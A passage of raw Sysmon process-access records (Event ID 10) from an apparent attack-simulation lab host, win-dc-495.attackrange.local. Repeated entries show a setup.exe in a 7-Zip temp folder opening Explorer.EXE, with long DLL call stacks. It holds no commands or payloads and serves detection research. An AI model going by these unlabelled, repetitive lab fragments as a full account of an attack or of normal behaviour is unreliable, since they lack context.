75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015465Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015464Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015463Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015462Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015461Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015460Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015459Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015458Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015457Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015456Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015455Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015454Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015453Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015452Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015451Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015450Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015449Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015448Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 